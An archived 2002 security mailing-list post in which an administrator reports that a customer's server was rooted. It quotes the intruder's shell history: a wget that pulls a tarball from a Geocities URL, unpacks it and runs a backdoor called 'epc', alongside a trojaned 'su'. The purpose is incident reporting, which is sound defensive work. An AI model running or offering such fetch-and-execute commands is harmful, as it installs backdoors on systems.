On Mon, 2002-12-16 at 12:38, Damian Gerow wrote: > On Thu, 2002-12-12 at 18:50, Damian Gerow wrote: > > I've just received word that one of our customers was rooted, and he's asking about the file ".haos". Nothing rings any bells, has anyone heard of it? > > Just a quick update to this... And one last tidbit... Left in the .bash_history was this: w cd /tmp wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz ./epc A quick check tells me that 'epc' is a backdoor utility, and the other file contained within loc.tgz looks like a trojaned 'su'. I've already notified Geocities abuse, and haven't heard back from them yet. ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Wed Dec 18 2002 - 17:46:24 PST